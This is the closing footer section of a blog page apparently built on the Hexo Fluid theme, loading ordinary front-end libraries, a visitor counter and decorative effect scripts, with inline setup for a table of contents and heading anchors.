<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>




  
    <script  src="/js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.20.1/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init(Object.assign({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      scrollSmooth    : true,
      includeTitleTags: true,
      headingsOffset  : -boardTop,
    }, CONFIG.toc));
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }

    Fluid.events.registerRefreshCallback(function() {
      if ('tocbot' in window) {
        tocbot.refresh();
        var toc = jQuery('#toc');
        if (toc.length === 0 || !tocbot) {
          return;
        }
        if (toc.find('.toc-list-item').length > 0) {
          toc.css('visibility', 'visible');
        }
      }
    });
  });
</script>


  <script src=https://lib.baomitu.com/clipboard.js/2.0.11/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/4.3.1/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));

    Fluid.events.registerRefreshCallback(function() {
      if ('anchors' in window) {
        anchors.removeAll();
        var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
        var res = [];
        for (var item of el) {
          res.push('.markdown-body > ' + item.trim());
        }
        if (CONFIG.anchorjs.placement === 'left') {
          anchors.options.class = 'anchorjs-link-left';
        }
        anchors.add(res.join(', '));
      }
    });
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  <script  src="/js/local-search.js" ></script>

  <script defer src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js" ></script>




  
<script src="//cdn.jsdelivr.net/gh/EmoryHuang/BlogBeautify@1.1/runtime.min.js"></script>
<script src="//cdn.jsdelivr.net/gh/EmoryHuang/BlogBeautify@1.1/DynamicLine.min.js"></script>
<script src="//cdn.jsdelivr.net/gh/EmoryHuang/BlogBeautify@1.1/snowflake.min.js"></script>
<script src="//cdn.jsdelivr.net/gh/EmoryHuang/BlogBeautify@1.1/love.min.js"></script>



<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">博客在允许 JavaScript 运行的环境下浏览效果更佳</div>
  </noscript>
</body>
</html>
